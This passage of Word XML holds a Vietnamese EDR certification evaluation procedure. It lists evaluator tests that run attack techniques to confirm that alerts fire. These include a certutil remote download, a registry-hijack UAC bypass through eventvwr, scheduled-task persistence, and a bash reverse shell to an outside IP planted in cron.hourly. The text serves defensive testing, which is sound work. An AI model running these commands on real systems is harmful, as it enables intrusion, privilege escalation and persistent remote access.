            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá viên phải kiểm tra TSS để xác định TSS mô tả những định dạng nào được hỗ trợ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="1C7DB820" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="227F7EE2" w14:textId="69C10025" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00DE3774" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hướng dẫn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8535" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="103369B7" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đánh giá viên phải xem xét hướng dẫn hoạt động để xác định TSS chứa tài liệu về việc đăng ký và hủy kiểm soát máy chủ trung gian từ EDR.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F6B3B25" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đánh giá viên phải xem xét hướng dẫn hoạt động để xác định danh sách các loại hoạt động trái phép được EDR phân loại hoặc gắn nhãn khi phát hiện.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FC8AD9D" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đánh giá viên phải đảm bảo hướng dẫn bao gồm bất kỳ thông tin cấu hình cần thiết nào để hiển thị cảnh báo liên quan đến những thay đổi trong trạng thái đăng ký Host và các hoạt động có khả năng trái phép.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00B96290" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đánh giá viên phải xem xét hướng dẫn hoạt động để xác định TSS chứa tài liệu về việc sử dụng giao diện quản trị để trực quan hóa và xem cảnh báo.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6306F1F9" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đánh giá viên phải xem xét hướng dẫn hợp lý để xác định TSS chứa tài liệu về các sản phẩm được hỗ trợ để xuất cảnh báo ở các định dạng dựa trên tiêu chuẩn.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="5C954B8F" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E0D5A53" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8535" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="014EEC8F" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đánh giá viên thực hiện các bài kiểm tra sau:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BD5EB96" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đánh giá viên phải tuân theo hướng dẫn để hủy kiểm tra Tác nhân máy chủ từ EDR và xác minh rằng hành động không được cấp phép đã được ghi lại trong nhật ký hoạt động có thể kiểm toán và được đánh dấu thời gian.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68BBB7D3" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đánh giá viên phải được hướng dẫn đăng ký đối tượng máy chủ vào EDR và xác minh rằng hành động ghi danh được ghi lại trong nhật ký hoạt động có thể kiểm toán và được đánh dấu thời gian.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04881942" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đối với Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>, Đánh giá viên phải kiểm tra khả năng phát hiện hoạt động bất  thường của EDR  bằng cách thực hiện các bài kiểm tra phụ dựa trên nền tảng của hệ thống Tác nhân máy chủ đã đăng ký, xác minh cho từng cảnh báo tương ứng được tạo trong giao diện quản trị:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="743DB943" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Thử nghiệm 1</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>: Đánh giá viên phải mở dấu nhắc lệnh Windows với tư cách là người dùng và chạy lệnh  cmd /c certutil - urlcache - split - f &lt;remote tệp tin&gt; &lt;download directory&gt;,  trong đó tệp từ xa là đường dẫn tệp hợp lệ đến tệp thực thi có thể truy cập, được lưu trữ từ xa và thư mục tải xuống là một đường dẫn thư mục hợp lệ được ghi bởi người dùng hiện tại.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EF939B2" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Thử nghiệm 2</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>: Đánh giá viên phải mở dấu nhắc lệnh Windows với tư cách là người dùng và chạy lệnh  reg.exe add hkcu\software\classes\msctệp tin\shell\open\command /ve /d "&lt;local executable&gt;" /f, trong đó tệp thực thi cục bộ là đường dẫn tệp hợp lệ đến tệp thực thi cục bộ, có thể đọc được. Thực hiện đánh giá hoặc chạy lệnh  cmd.exe /c eventvwr.msc trong cùng một cửa sổ dấu nhắc lệnh sau đó.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A275355" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Thử nghiệm 3</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>: Đánh giá viên phải mở dấu nhắc lệnh Windows với tư cách là người dùng và chạy lệnh  SCHTASKS /Create /SC ONCE /TN spawn /TR &lt;loccutable&gt;"   /ST  &lt;time&gt;,trong đó tệp thực thi cục bộ là đường dẫn tệp hợp lệ đến tệp có thể đọc được, thực thi cục bộ và thời gian là thời gian bắt đầu xảy ra trong khoảng thời gian kể từ khi tác vụ được tạo.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11B4AC7D" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đối với Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>, Đánh giá viên phải kiểm tra khả năng phát hiện hoạt động bất   thường của EDR bằng cách thực hiện các kiểm tra phụ theo dõi dựa trên nền tảng của hệ thống Máy chủ trung gian đã đăng ký, xác minh cho từng cảnh báo tương ứng được tạo trong giao diện quản trị:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B49EB42" w14:textId="5C8177C8" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Thử nghiệm 1</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">: Đánh giá viên phải mở một thiết bị </w:t>
            </w:r>
            <w:r w:rsidR="005157CB" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>điểm cuối</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> và chạy lệnh scp&lt;remote user&gt;@&lt;remote host&gt;: &lt;remote path&gt; &lt;download directory&gt;, trong đó người dùng từ xa là người dùng hợp lệ trên máy chủ từ xa; đường dẫn từ xa là một đường dẫn hợp lệ cho một tệp thực thi được lưu trữ từ xa và thư mục tải xuống là một đường dẫn thư mục hợp lệ được ghi bởi người dùng cục bộ hiện tại. Mật khẩu của user từ xa sẽ được cung cấp khi được nhắc.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DD3377E" w14:textId="55D701BD" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Thử nghiệm 2</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">: Đánh giá viên phải mở một thiết bị </w:t>
            </w:r>
            <w:r w:rsidR="005157CB" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>điểm cuối</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> và chạy lặp lại lệnh "bash -i &gt;&amp; /dev/tcp/&lt;outside IP&gt;/5050  0&gt;&amp;1 1 &amp;" &gt; /etc/cron.hourly/persist, trong đó IP bên ngoài là  một địa chỉ bên ngoài hợp lệ.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B04A18E" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đối với tất cả các nền tảng:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BB6BB0D" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Thử nghiệm 1</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>: Đánh giá viên phải xem xét cảnh báo trên giao diện quản trị và xác minh rằng cảnh báo có chứa trường mức độ nghiêm trọng và các trường được chỉ định trong ST. Đánh giá viên phải mở hoặc xem cảnh báo và xác minh rằng dòng thời gian của các sự kiện có sẵn để xem xét. Dòng thời gian sẽ hiển thị sự tiến triển của các sự kiện theo thời gian.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C329BF2" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Thử nghiệm 2:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Đánh giá viên phải chọn một cảnh báo trên giao diện quản trị và xuất cảnh báo ở mọi định dạng được chỉ định trong ST. Đánh giá viên phải xem xét hướng dẫn vận hành và lựa chọn từ yêu cầu và xác minh rằng các tùy chọn xuất tồn tại cho tất cả các định dạng được khai báo trong lựa chọn. Sau khi xuất một cảnh báo cho mỗi định dạng có thể, Đánh giá viên phải xem xét nội dung tệp của cảnh báo đã xuất </w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>và xác minh đó là định dạng chính xác cho tùy chọn xuất đã chọn (ví dụ: bản xuất thuộc loại IODEF phải chứa 'IODEF-Document' trong phần tử đầu tiên của tệp đã xuất).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66809313" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>.1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> FAU_COL_EXT.1 Dữ liệu điểm cuối được thu thập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C13598B" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FAU_COL_EXT.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5F0EDF" w14:textId="02FEF7B9" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">EDR </w:t>
      </w:r>
      <w:r w:rsidR="00087086" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>phải</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> thu thập bộ dữ liệu điểm cuối sau đây từ tác nhân máy chủ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CA77FF" w14:textId="58B3EF6B" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">a. Phiên bản Hệ điều hành, kiến trúc và Địa chỉ IP, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6A5C8F" w14:textId="7515D196" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">b. Hoạt động đăng nhập tài khoản tại thiết bị </w:t>
      </w:r>
      <w:r w:rsidR="005157CB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>điểm cuối</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> đặc quyền và không có đặc quyền;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776DBB94" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>c. Tạo quy trình,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C2109B" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>d. Thư viện và cấu trúc được tải bởi các quy trình,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B03DD40" w14:textId="249BFD74" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">e. Tên tệp và [ </w:t>
      </w:r>
      <w:r w:rsidR="008D70AF" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chỉ định</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>metadata khác</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>] của các tệp được tạo và [</w:t>
      </w:r>
      <w:r w:rsidR="004769FD" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004769FD" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chỉ định</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">các hoạt động khác được thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="004769FD" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>với</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="22"/>
        </w:rPr>
